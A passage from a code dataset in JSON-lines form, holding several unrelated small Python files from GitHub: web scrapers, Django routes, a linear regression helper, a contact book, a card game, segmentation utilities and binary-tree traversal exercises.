plt.legend()\n\n","repo_name":"WilliamLiu666/M4R_PCA","sub_path":"geneig.py","file_name":"geneig.py","file_ext":"py","file_size_in_byte":3227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"31830491066","text":"def fact(x):\n\tif x == 0:\n\t\tresult = 1\n\telse:\n\t\tresult = x\n\t\tx -= 1\n\t\twhile x >= 1:\n\t\t\tresult *= x\n\t\t\tx -= 1\n\treturn result\n\ndef c(n,r):\n\treturn (fact(n))/(fact(r)*fact(n-r))\n\ndef pascal(a):\n\tans = []\n\tfor i in range(0,a+1):\n\t\tans.append(c(a,i))\n\treturn ans\n\n\n","repo_name":"burhanr13/python_code","sub_path":"pascaltriangle.py","file_name":"pascaltriangle.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"38"} +{"seq_id":"32266230788","text":"from django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.urls import path\n\nfrom . import views\n\napp_name = \"vacancies\"\n\nurlpatterns = [\n path(\"vacancies/\", views.index, name=\"index\"),\n path(\"vacancies//\", views.vacancy_detail, name=\"vacancy_detail\"),\n path(\"vacancies//feedback/\", views.send_feedback, name=\"feedback\"),\n path(\"apl-feedback/\", views.feedback_list, name=\"applicant_feedback\"),\n path(\"del-apl-feedback//\", views.del_applicant_feedback, name=\"del_applicant_feedback\"),\n path(\"empl-feedback/\", views.employer_feedback_list, name=\"employer_feedback\"),\n path(\"create-vacancy/\", views.create_vacancy, name=\"create_vacancy\"),\n]\nurlpatterns += static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)\n","repo_name":"Talgatovich/vacancies_service","sub_path":"vacancies_project/vacancies/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":789,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70429731952","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup \nfrom fileinput import filename\n\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36',\n 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3',\n'Accept-Encoding':'gzip, deflate, br',\n'Accept-Language': 'zh-CN,zh;q=0.9',\n'Cookie': 'PHPSESSID=10umpmsfnf32qcfcmed0c8ta72; Hm_lvt_ecb3501bb595c7329991bac49358921a=1578833673; UM_distinctid=16f99d1f9734e3-06babfedacc037-c383f64-1fa400-16f99d1f974b01; CNZZDATA1272815512=338166673-1578830842-%7C1578830842; Hm_lpvt_ecb3501bb595c7329991bac49358921a=1578835560'\n }\n\np1 = re.compile('16839/(.*?).html\"')\ndef get_url():\n with open('mh.html','r',encoding='utf-8') as f:\n fp = f.read()\n hh = re.findall(p1,fp)\n return hh\n\n\ndef get_con(id):\n html = requests.get('https://m.bnmanhua.com/comic/16839/'+ id +'.html',headers=headers)\n html.encoding=html.apparent_encoding\n ss=html.text\n return ss\n\np2 = re.compile(r\"16839(.*?).jpg\")\np3 = re.compile('斗罗大陆4终极斗罗漫画-(.*?)-全')\ndef get_img(tx):\n imgurl = re.findall(p2, tx)\n return imgurl\n \ndef get_title(tx):\n title = re.findall(p3,tx)\n return title\n\nurl = get_url()\n# com = get_con(url[2])\n# i = get_img(com)\nprint(len(url))\nprint(url[63])\n# o=i[1]\n# print(type(o))\nimport time\nfor j in range(64,len(url)):\n con = get_con(url[j])\n img = get_img(con)\n print(img)\n for i in range(len(img)):\n img[i].replace('\\\\','')\n url='https://img.yaoyaoliao.com/upload/files/16839'+img[i]+'.jpg'\n q=url.split('\\\\')\n url = q[0]+q[1]+q[2]\n res = requests.get(url=url)\n title = get_title(con)\n time.sleep(0.1)\n filename = 'D:\\\\HH\\\\%s_%s.jpg' % (title,str(i))\n w = open(filename,'wb')\n w.write(res.content)\n \n \n# url1.sort()\n# w = open('d6.txt','a',encoding='utf-8')\n# for id in url1:\n# id = str(id)\n# ss = get_con(id)\n# soup = BeautifulSoup(ss,'html.parser')\n# title = soup.find(name='div',id=\"title\").text\n# content = soup.find(name='div',id=\"content\").text\n# print(title)\n# wr=w.write(title)\n# w.write('\\n')\n# wr=w.write(content)\n# w.write('\\n')\n# w.close()\n","repo_name":"yzmbdays123/test","sub_path":"jingli_game/test_wemew/漫画.py","file_name":"漫画.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"22254392508","text":"def draw_board(board):\n \"\"\"\n Accepts a list of lists which makes up the board.\n Assumes the board is a list of rows. (See my_board)\n \"\"\"\n # Draw the column indexes.\n print(\" \", end=\"\")\n for index, col in enumerate(board):\n # Print the index of each column.\n # Note: sep=\"\", end=\"\" prevent python from creating a new line.\n print(\" C\" + str(index) + \" \", sep=\"\", end=\"\")\n print(\"\") # Creates a line break.\n for index, row in enumerate(board):\n # Print the row border.\n print(\" \" + (\"+----\" * 8) + \"+\", sep=\"\")\n # Print the row index.\n print(\"R\" + str(index) + \" \", sep=\"\", end=\"\")\n # Print each cell\n for cell in row:\n print(\"| \" + str(cell) + \" \", sep=\"\", end=\"\")\n print(\"|\") # Finishes the row.\n # Print the end border.\n print(\" \" + (\"+----\" * 8) + \"+\", sep=\"\")\n \nmy_board = [\n [\"br\", \"bk\", \"bb\", \"bq\", \"bk\", \"bb\", \"bk\", \"br\"],\n [\"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\", \"bp\"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\" \", \" \", \" \", \" \", \" \", \" \", \" \", \" \"],\n [\"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\", \"wp\"],\n [\"wr\", \"wk\", \"wb\", \"wq\", \"wk\", \"wb\", \"wk\", \"wr\"]\n]\n\nprint(my_board)\n# draw_board(my_board)","repo_name":"Hoverbear/SPARCS","sub_path":"week4/board.py","file_name":"board.py","file_ext":"py","file_size_in_byte":1386,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"26208116691","text":"import requests\nimport re\nfrom bs4 import BeautifulSoup\nimport json\nimport random\n\nurl = \"https://news.tsinghua.edu.cn/tsqh.htm\"\nheaders = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.117 Safari/537.36'}\npath = \"D:/picNews.json\"\n\n\ndef get_page():\n session = requests.session()\n res = session.get(url, headers=headers, timeout=2)\n res.encoding = 'utf-8'\n page = res.text\n return page\n\n\ndef rep(strs):\n suffix = \"?/|\\.><:*\"\n for s in suffix:\n if s in strs:\n strs.replace(s, \"\")\n return strs\n\n# picwhitenewslist\ndef parse_html(html):\n soup = BeautifulSoup(html, \"html.parser\")\n all_list = []\n for li in soup.find_all(\"figure\"):\n # 获取图片地址\n img = li.find(\"img\")\n if img:\n img = \"https://news.tsinghua.edu.cn/\" + img[\"src\"]\n # 获取标题\n title = li.select(\"a.jiequ\")\n if title:\n title = rep(title[0].string)\n else:\n continue\n # 获取创建时间\n time = li.select(\"i.thunews-clock-o\")\n if time:\n time = time[0].next_element\n # 随机生成阅览人数\n view = random.randint(800,8000)\n all_obj = {\n \"img\": img,\n \"title\": title,\n \"time\": time,\n \"view\" : view,\n }\n all_list.append(all_obj)\n print(all_list)\n return all_list\n\nhtml = get_page()\nlists = parse_html(html)\n# 生成json文件\nwith open(path, 'w', encoding='utf-8') as writer:\n json.dump(lists, writer, ensure_ascii=False, indent=2)\n","repo_name":"llwodexue/tsinghua_news","sub_path":"get_tsinghua.py","file_name":"get_tsinghua.py","file_ext":"py","file_size_in_byte":1627,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"14578496174","text":"import pytest\nimport yaml\nfrom elements.excel_data import ExcelData\nfrom utils.api import ApiMethods\n\nclass TestLogin:\n \n #parse yaml file\n with open(\"api.yaml\", \"r\") as stream:\n try:\n data = yaml.safe_load(stream)\n except yaml.YAMLError as e:\n print(e)\n #parse xlsx file\n data = ExcelData(\"api\")\n\n\n\n apiTrain= ApiMethods(data)\n\n @pytest.mark.parametrize(('data_dict', 'path_dict', 'assert_dict'), data.list_data, ids=data.list_desc)\n def test_1(self, data_dict, path_dict, assert_dict):\n\n res = self.apiTrain.get(url)\n data = res.get('data')\n assert data is not None","repo_name":"abc12345131/Jenkins-pytest-allure-pipeline","sub_path":"test demo/TestCase/test_login.py","file_name":"test_login.py","file_ext":"py","file_size_in_byte":648,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"24143743501","text":"import numpy as np\nimport pandas as pd\nimport scipy.stats\n\n\nclass LinearRegression:\n \"\"\" Compute the linear regression of two variables\n\n Parameters\n ----------\n x, y: array-like or str\n these must be array-like of numeric with equal length\n or refer to keys for numeric variables in a dataframe-like object\n data: dataframe-like or None; default=None\n If provided, 'x' and 'y' are used as column indexes in data\n drop_na: bool; default=True\n If true, cases with nan values are excluded\n\n Attributes\n ----------\n data: pd.DataFrame\n data used for computing linear regression \n m, b, r, p, e: numeric\n outputs of scipy.stats.linregress\n x_pred, y_pred: np.ndarray\n coordinates for line of best fit\n x_label, y_label: str\n labels for x and y variables\n \"\"\"\n\n def __repr__(self):\n return f\"x={self.x_label} & y={self.y_label}; y'={self.m}x+{self.b}; r={self.r}, p={self.p}\"\n\n def __init__(self, x, y, data=None, drop_na=True, x_pred=None):\n if data is None:\n self.data = pd.DataFrame({\"x\": x, \"y\": y})\n x, y = \"x\", \"y\"\n else:\n self.data = data\n\n self.x_label, self.y_label = x, y\n\n if drop_na:\n self.data = self.data.loc[:, [x, y]].dropna()\n elif self.data.loc[:, [x, y]].isna().any(None):\n raise ValueError(\n \"Data contains NaN values and drop_na has been set to False.\"\n )\n\n self.m, self.b, self.r, self.p, self.e = scipy.stats.linregress(\n self.data[x], self.data[y]\n )\n\n if x_pred is None:\n self.x_pred = np.array([self.data[x].min(), self.data[x].max()])\n else:\n self.x_pred = x_pred\n self.y_pred = self.m * self.x_pred + self.b\n\n def to_series(self):\n return pd.Series(\n {\"m\": self.m, \"b\": self.b, \"r\": self.r, \"p\": self.p, \"e\": self.e}\n )\n","repo_name":"jselvan/simianpy","sub_path":"simianpy/analysis/linear_regression.py","file_name":"linear_regression.py","file_ext":"py","file_size_in_byte":1963,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"35252773627","text":"file_handle = open ('agenda.txt', 'w')\nagenda = [] \n\ndef i_nome(): \n return(input(\"Nome: \"))\n\n\ndef i_telefone():\n return(input(\"Telefone: \"))\n\n\ndef i_email(): \n return(input(\"Email: \"))\n\n\ndef listar_dados(nome, telefone, email): \n print(\"Nome: %s\\nTelefone: %s\\nEmail: %s\" % (nome, telefone, email))\n\n\ndef pesquisa(nome): \n name = nome.lower() \n for d, e in enumerate(agenda):\n if (e[0].lower() == name): \n return d \n return None \n\ndef novo(): \n global agenda \n nome = i_nome() \n telefone = i_telefone()\n email = i_email() \n agenda.append([nome, telefone, email])\n\ndef apagar(): \n global agenda\n nome = i_nome()\n p = pesquisa(nome)\n if (p != None): \n del agenda[p] \n else:\n print(\"Nome não encontrado.\")\n\n\ndef editar(): \n p = pesquisa(i_nome()) \n if (p != None): \n nome = agenda[p][0] \n telefone = agenda[p][1] \n email = agenda [p][2]\n \n print(\"\\n **** Encontrado **** \\n\")\n \n listar_dados(nome, telefone, email) \n nome = i_nome() \n telefone = i_telefone() \n email = i_email() \n agenda[p] = [nome, telefone, email] \n else:\n print(\"Nome não encontrado!\")\n\n\n\ndef listar():\n \n print(\"\\n*************************** \\n \\tAgenda\\n\\n***************************\")\n\n file_handle = open ('agenda.txt', 'a')\n file_handle.write(str(agenda))\n \n for coisa in agenda:\n file_handle = open ('agenda.txt', 'r')\n file_handle.readlines()\n print(listar_dados(coisa[0], coisa[1], coisa[2]) , '\\n')\n return ' '\n print(\"***************************\\n\")\n \n\nfile_handle.close()\n\ndef pesquisar(): \n p = pesquisa(i_nome()) \n if (p != None): \n nome = agenda[p][0] \n telefone = agenda[p][1] \n email = agenda[p][2] \n print(\"\\n **** Encontrado **** \\n\") \n listar_dados(nome, telefone, email) \n else:\n print(\"Nome não encontrado!\") \n\ndef validar(pergunta, inicio, fim): \n while True: \n try: \n valor = int(input(pergunta)) \n if (inicio <= valor <= fim): \n return(valor) \n \n except ValueError: \n print(\"Valor inválido, favor digitar entre %d e %d\" % (inicio, fim))\n\ndef menu(): \n print(\"\"\"\n 1 - Novo contato\n 2 - Editar um contato\n 3 - Pesquisar contato\n 4 - Todos os Contatos\n 5 - Apagar um contato\n 6 - Sair\n\"\"\")\n \n return validar(\"Escolha uma opção: \",1,6) \n\n\nwhile (True): \n opção = menu()\n if (opção == 6): \n break\n elif (opção == 1):\n novo()\n elif (opção == 2):\n editar()\n elif (opção == 3):\n pesquisar()\n elif (opção == 4):\n listar()\n elif (opção == 5):\n apagar()\n\n \n#desenvolvido por Adrielle Alves & Adnaelle Alves\n#Trabalho de FuP\n# #MeDáUm10\n# #EmNomeDeJesus\n# #É_Serio\n","repo_name":"bomdya/agenda.py","sub_path":"agendacontatos.py","file_name":"agendacontatos.py","file_ext":"py","file_size_in_byte":3467,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"12914548329","text":"\"\"\"Algorithm of total inversion (Tarantola and Valette, 1982).\"\"\"\nimport numpy as np\n\nfrom src.modelequations import evaluate_model_equations\n\n\ndef calculate_xkp1(Co, xo, xk, f, F):\n \"\"\"Calculate an estimate of the state vector.\"\"\n\n Args:\n Co (np.ndarray): Error covariance matrix of prior estimates.\n xo (np.ndarray): State vector of prior estimates.\n xk (np.ndarray): State vector of estimates at the beginning of an\n iteration, k.\n f (np.ndarray): Vector of functions containing the model equations.\n F (np.ndarray): The Jacobian matrix.\n\n Returns:\n xkp1 (np.ndarray): State vector of new estimates produced after\n iteration k.\n CoFT, FCoFTi (np.ndarray): Matrix products used in subsequent steps.\n \"\"\"\n CoFT = Co @ F.T\n FCoFT = F @ CoFT\n FCoFTi = np.linalg.inv(FCoFT)\n xkp1 = xo + CoFT @ FCoFTi @ (F @ (xk - xo) - f)\n\n return xkp1, CoFT, FCoFTi\n\n\ndef check_convergence(xk, xkp1):\n \"\"\"Check if the model has converged.\n\n Args:\n xk (np.ndarray): State vector of estimates at the beginning of an\n iteration, k.\n xkp1 (np.ndarray): State vector of new estimates produced after\n iteration k.\n\n Returns:\n converged (bool): True if model converged.\n max_change (float): The magnitude of the largest change in a single\n state element before and after iteration k.\n \"\"\"\n converged = False\n max_change_limit = 10**-6\n change = np.abs((xkp1 - xk) / xk)\n max_change = np.max(change)\n\n if max_change < max_change_limit:\n converged = True\n\n return converged, max_change\n\n\ndef calculate_cost(Co, xo, x):\n \"\"\"Evaluate the cost function given an estimate of the state vector, x\"\"\"\n cost = (x - xo).T @ np.linalg.inv(Co) @ (x - xo)\n\n return cost\n\n\ndef find_solution(equation_elements, state_elements, xo, Co, grid, zg,\n umz_start, mld=None, soft_constraint=False):\n \"\"\"An iterative approach for finding a solution to a nonlinear system.\n\n Args:\n state_elements (list[str]): Names of state elements.\n equation_elements (list[str]): Names of state elements that have\n associated equations (i.e., the tracers).\n xo (np.ndarray): State vector of prior estimates.\n Co (np.ndarray): Error covariance matrix of prior estimates.\n grid (list[float]): The model grid.\n zg (float): The maximum grazing depth, also the base of the euphotic\n zone.\n umz_start (int): Index of grid which corresponds to the depth of the\n base of the first layer in the upper mesopelagic zone.\n mld (float): Mixed layer depth.\n\n Returns:\n xhat (np.ndarray): Estimate of the state vector produced once the model\n has converged (i.e., the solution).\n Ckp1 (np.ndarray): Error covariance matrix of posterior estimates.\n convergence_evolution (list): A history of the magnitude of the\n maximum elementwise change in the state vector before and after an\n iteration.\n cost_evolution (list): A history of the cost.\n converged (bool): True if model converged.\n \"\"\"\n max_iterations = 50\n convergence_evolution = []\n cost_evolution = []\n xhat = np.full(xo.shape, -9999)\n Ckp1 = np.full(Co.shape, -9999)\n\n xk = xo\n xkp1 = np.ones(len(xk)) # at iteration k+1\n for count in range(max_iterations):\n f, F = evaluate_model_equations(\n equation_elements, xk, grid, zg, umz_start, mld,\n state_elements=state_elements, soft_constraint=soft_constraint)\n\n xkp1, CoFT, FCoFTi = calculate_xkp1(Co, xo, xk, f, F)\n cost = calculate_cost(Co, xo, xkp1)\n\n cost_evolution.append(cost)\n if count > 0: # xk contains 0's for residuals when k=0\n converged, max_change = check_convergence(xk, xkp1)\n convergence_evolution.append(max_change)\n if converged:\n Ckp1 = Co - CoFT @ FCoFTi @ F @ Co\n xhat = xkp1\n break\n xk = xkp1\n\n return xhat, Ckp1, convergence_evolution, cost_evolution, converged\n\n\ndef normalized_state_residuals(xhat, xo, Co):\n \"\"\"Calculate residuals of state estimates relative to prior estimates.\"\"\"\n x_resids = list((xhat - xo) / np.sqrt(np.diag(Co)))\n\n return x_resids\n\n\ndef success_check(converged, state_elements, xhat, Ckp1, zg):\n \"\"\"Check for negative concentrations and model parameters in a solution.\"\"\"\n if not converged:\n return False\n \n indexes = [i for i, s in enumerate(state_elements) if 'R' not in s]\n nonresidual_estimates = [xhat[i] for i in indexes]\n negative_estimates = any(i < 0 for i in nonresidual_estimates)\n if negative_estimates:\n return False\n \n variances = np.diag(Ckp1)\n nonresidual_variances = [variances[i] for i in indexes]\n negative_variances = any(i < 0 for i in nonresidual_variances)\n if negative_variances:\n return False\n \n zm = xhat[state_elements.index('zm')]\n if zm < zg:\n return False\n\n return True\n","repo_name":"amaralvin7/pyrite","sub_path":"src/ati.py","file_name":"ati.py","file_ext":"py","file_size_in_byte":5078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"23791426069","text":"from Player import Player\nfrom Deck import Deck\n\ndec = Deck()\ndec.shuffle()\n(firstDeck, secondDeck) = dec.provide_deck()\n\nfirstPlayer = Player(firstDeck)\nsecondPlayer = Player(secondDeck)\n\nisContinuePlay = True\npileCards = []\nturn = 0\nwhile isContinuePlay:\n firstPlayerCard = firstPlayer.pop()\n secondPlayerCard = secondPlayer.pop()\n print(f'[{turn}] firstPlayerCard: {firstPlayerCard}')\n print(f'[{turn}] secondPlayerCard: {secondPlayerCard}')\n\n pileCards.append(firstPlayerCard)\n pileCards.append(secondPlayerCard)\n if firstPlayerCard.rank.value == secondPlayerCard.rank.value:\n print('Draw')\n pileCards.extend(firstPlayer.draw())\n pileCards.extend(secondPlayer.draw())\n elif firstPlayerCard.rank.value < secondPlayerCard.rank.value:\n print(f'secondPlayer is win, has {len(pileCards)} cards')\n secondPlayer.win(pileCards)\n pileCards = []\n else:\n print(f'firstPlayer is win, has {len(pileCards)} cards')\n firstPlayer.win(pileCards)\n pileCards = []\n\n print(f'[{turn}] {firstPlayer} isLose: {firstPlayer.isLose()}')\n print(f'[{turn}] {secondPlayer} isLose: {secondPlayer.isLose()}')\n turn = turn + 1\n isContinuePlay = not (firstPlayer.isLose() or secondPlayer.isLose())\n","repo_name":"yongju-jin/wargame","sub_path":"WarGame.py","file_name":"WarGame.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"30725942253","text":"import colors\n\nscreen_width = 1000\nscreen_height = 600\nbackground_image = 'images/background.jpg'\n\nframe_rate = 50\n\nrow_count = 6\nbrick_width = 60\nbrick_height = 20\nbrick_color = colors.RED1\noffset_y = brick_height + 10\n\nball_speed = 3\nball_radius = 8\nball_color = colors.GREEN\n\npaddle_width = 80\npaddle_height = 20\npaddle_color = colors.ALICEBLUE\npaddle_speed = 6\n\nstatus_offset_y = 5\n\ntext_color = colors.YELLOW1\ninitial_lives = 3\nlives_right_offset = 85\nlives_offset = screen_width - lives_right_offset\nscore_offset = 5\n\nfont_name = 'Tahoma'\nfont_size = 15\n\neffect_duration = 20\n\nround_time = 20\n\nbutton_pictures = {\n 'PLAY': 'images/Play.png',\n 'QUIT': 'images/Quit.png',\n 'GUN': 'images/Gun.png',\n 'BAZUKA': 'images/Bazuka.png',\n 'WIN_1': 'images/images/Winner_1.png',\n 'WIN_2': 'images/images/Winner_2.png'\n}\nmessage_duration = 1\n\nbutton_text_color = colors.WHITE,\nbutton_normal_back_color = colors.INDIANRED1\nbutton_hover_back_color = colors.INDIANRED2\nbutton_pressed_back_color = colors.INDIANRED3\n\nmenu_button_w = 60\nmenu_button_h = 40\nmenu_offset_y = 20\nmenu_offset_x = screen_width-menu_button_w-menu_offset_y\n\nsprite_width =20\nsprite_height =20\nground_image = 'images/ground.png'\nworm_image_1 = 'images/worm1.png'\nworm_image_2 = 'images/worm2.png'\nplayer_image_1 = 'images/Player1.png'\nplayer_image_2 = 'images/Player2.png'\ngun_image='images/G.png'\nbullet_image='images/Bullet.png'\ngun2_image='images/B.png'\nbullet2_image='images/Gr.png'\n\n","repo_name":"Bcrfntkm/Final-Project","sub_path":"config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":1473,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"5585177953","text":"import numpy as np\nimport cv2\n\n\ndef dice_coeff_kaggle(y_pred, y_true):\n '''Dice Coefficient metric as defined in the Kaggle competition.\n '''\n dice_scores = per_class_dice_coeff(y_pred, y_true)\n return np.mean(dice_scores)\n\ndef per_class_dice_coeff(y_pred, y_true):\n y_pred = np.where(y_pred > 0.5, 1, 0)\n\n dice_scores = []\n for i in range(y_pred.shape[-1]):\n y_pred_sum = np.sum(y_pred[:, :, i])\n y_true_sum = np.sum(y_true[:, :, i])\n if y_pred_sum == 0 and y_true_sum == 0:\n dice_scores.append(1.0)\n continue\n intersection = np.sum(y_pred[:, :, i] * y_true[:, :, i])\n dice_scores.append(\n 2 * intersection / (y_pred_sum + y_true_sum))\n return np.array(dice_scores)\n\n\ndef rle_to_dense(rle, img_height, img_width):\n '''Convert the rle representation of a single class mask to the equivalent dense binary np\n array.\n '''\n if rle is None or rle == '':\n return np.zeros((img_height, img_width), dtype=np.uint8)\n rle_list = rle.strip().split(' ')\n rle_pairs = [(int(rle_list[i]), int(rle_list[i+1])) for i in range(0, len(rle_list), 2)]\n\n dense_1d_array = np.zeros(img_height * img_width, dtype=np.uint8)\n for rle_start, rle_run in rle_pairs:\n # Subtract 1 from indices because pixel indices start at 1 rather than 0\n dense_1d_array[rle_start - 1:rle_start + rle_run - 1] = 1\n \n # Use Fortran ordering, meaning that the first index changes fastest (sort of unconventional)\n dense_2d_array = np.reshape(dense_1d_array, (img_height, img_width), order='F')\n return dense_2d_array\n\n\ndef dense_to_rle(dense):\n '''Convert the dense np ndarray representation of a single class mask to the equivalent rle\n representation.\n '''\n assert len(dense.shape) == 2\n # Use Fortran (column-major) ordering\n pixels = dense.flatten(order='F')\n pixels = np.concatenate([[0], pixels, [0]])\n runs = np.where(pixels[1:] != pixels[:-1])[0] + 1\n runs[1::2] -= runs[::2]\n return ' '.join(str(x) for x in runs)\n\n\ndef visualize_segmentations(img, anns):\n '''Visualize a set of segmentations (ground truth or predicted) on an image.\n '''\n vis_img = img.copy()\n \n colours = [[0, 235, 235], [0, 210, 0], [0, 0, 255], [255, 0, 255]]\n for i in range(4):\n mask = anns[:, :, i]\n if np.any(mask):\n print(f'Class {i}')\n kernel = np.ones((10, 10), np.uint8) \n dilated_mask = cv2.dilate(mask, kernel, iterations=1)\n contour_mask = dilated_mask - mask\n for c in range(3):\n vis_img[contour_mask == 1, c] = colours[i][c]\n return vis_img\n\n\ndef onehottify(x, n=None, dtype=float):\n '''1-hot encode x with the max value n (computed from data if n is None).\n '''\n x = np.asarray(x)\n n = np.max(x) + 1 if n is None else n\n return np.eye(n, dtype=dtype)[x]\n\n\ndef print_cm(cm, labels, hide_zeroes=False, hide_diagonal=False, hide_threshold=None):\n \"\"\"pretty print for confusion matrixes\"\"\"\n columnwidth = max([len(x) for x in labels] + [5]) # 5 is value length\n empty_cell = \" \" * columnwidth\n # Print header\n print(\" \" + empty_cell, end=\" \")\n for label in labels:\n print(\"%{0}s\".format(columnwidth) % label, end=\" \")\n print()\n # Print rows\n for i, label1 in enumerate(labels):\n print(\" %{0}s\".format(columnwidth) % label1, end=\" \")\n for j in range(len(labels)):\n cell = \"%{0}.2f\".format(columnwidth) % cm[i, j]\n if hide_zeroes:\n cell = cell if float(cm[i, j]) != 0 else empty_cell\n if hide_diagonal:\n cell = cell if i != j else empty_cell\n if hide_threshold:\n cell = cell if cm[i, j] > hide_threshold else empty_cell\n print(cell, end=\" \")\n print()\n","repo_name":"RyanJDick/steel_seg","sub_path":"steel_seg/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":3836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"25609395387","text":"from utils import input_BinaryTreeNode_int32\nfrom utils import BinaryTreeNode\nfrom typing import List\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\n\ndef run(data,func,**args):\n root = input_BinaryTreeNode_int32(data[\"root\"])\n print(func(root,**args))\n#-------------------Problem-1--------------------------------------------------\n'''\n102. Binary Tree Level Order Traversal\n\n'''\ndef level_order_traversal(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_list_int32\n \"\"\"\n '''\n Time Complexity - O(n)\n Space Complexity - Worst Case O(n/2) ~O(n) - Number of nodes in the leaf level\n We know around 50% of nodes are in the last level\n '''\n result = []\n if root is None:\n return result\n queue = [root]\n while queue:\n numnodes = len(queue)\n temp = []\n for i in range(0,numnodes):\n node = queue.pop(0)\n temp.append(node.value)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n result.append(temp)\n return result\n\n#----------------------------------Problem-2-----------------------------------------------------\n'''\n429. N-ary Tree Level Order Traversal\n'''\n\n\"\"\"\nFor your reference:\nclass TreeNode:\n def __init__(self, value):\n self.value = value\n self.children = []\n\"\"\"\ndef level_order(root):\n \"\"\"\n Args:\n root(TreeNode_int32)\n Returns:\n list_list_int32\n \"\"\"\n # Write your code here.\n result = []\n if root is None:\n return result\n queue = [root]\n result = []\n while queue:\n numnode = len(queue)\n temp = []\n for i in range(0,numnode):\n node = queue.pop(0)\n temp.append(node.value)\n for child in node.children:\n queue.append(child)\n \n result.append(temp)\n return result\n\n\n#--------------------Problem-3------------------------------------------------------------\n'''\n199. Binary Tree Right Side View\n'''\n\ndef right_view(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_int32\n \"\"\"\n # Write your code here.\n result = []\n if result is None:\n return []\n queue = [root]\n while queue:\n numnodes = len(queue)\n for i in range(0,numnodes):\n node = queue.pop(0)\n temp = node.value\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n result.append(temp[-1])\n return result\n\n#---------------------------------Problem-3-----------------------------------------------\n\n'''\n107. Binary Tree Level Order Traversal II\n\nReverse Level Order Traversal\n'''\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef reverse_level_order_traversal(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_list_int32\n \"\"\"\n # Write your code here.\n result = []\n if root is None:\n return result\n queue = [root]\n result = []\n while queue:\n numnode = len(queue)\n temp = []\n for i in range(0,numnode):\n node = queue.pop(0)\n temp.append(node.value)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n \n result.append(temp)\n #reverse the result\n return result[::-1]\n\n\n#---------------------------------Problem-4----------------------------------------------\n'''\n103. Binary Tree Zigzag Level Order Traversal\n'''\n\n\"\"\"\nFor your reference:\nclass BinaryTreeNode:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\"\"\"\ndef zigzag_level_order_traversal(root):\n \"\"\"\n Args:\n root(BinaryTreeNode_int32)\n Returns:\n list_list_int32\n \"\"\"\n # Write your code here.\n result = []\n if root is None:\n return result\n queue = [root]\n righttoleft=False\n while queue:\n numnode = len(queue)\n temp = []\n for i in range(0,numnode):\n node = queue.pop(0)\n temp.append(node.value)\n if node.left:\n queue.append(node.left)\n if node.right:\n queue.append(node.right)\n if righttoleft:\n result.append(temp[::-1])\n else:\n result.append(temp)\n righttoleft = not righttoleft\n \n return result\n\n\n#---------------------------------Problem-5----------------------------------------------\n'''\n2415. Reverse Odd Levels of Binary Tree\n\n'''\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\ndef reverseOddLevels( root):\n\n if root is None:\n return []\n \n result = []\n q = [root]\n while q:\n q_len = len(q)\n temp = []\n i = 0\n for _ in range(q_len):\n node = q.pop(0)\n temp.append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if i%2==0:\n result.extend(temp)\n else:\n result.extend(temp[::-1])\n i=i+1\n\n def insertLevelOrder(arr, i, n):\n root = None\n if i < n:\n root = TreeNode(arr[i]) \n root.left = 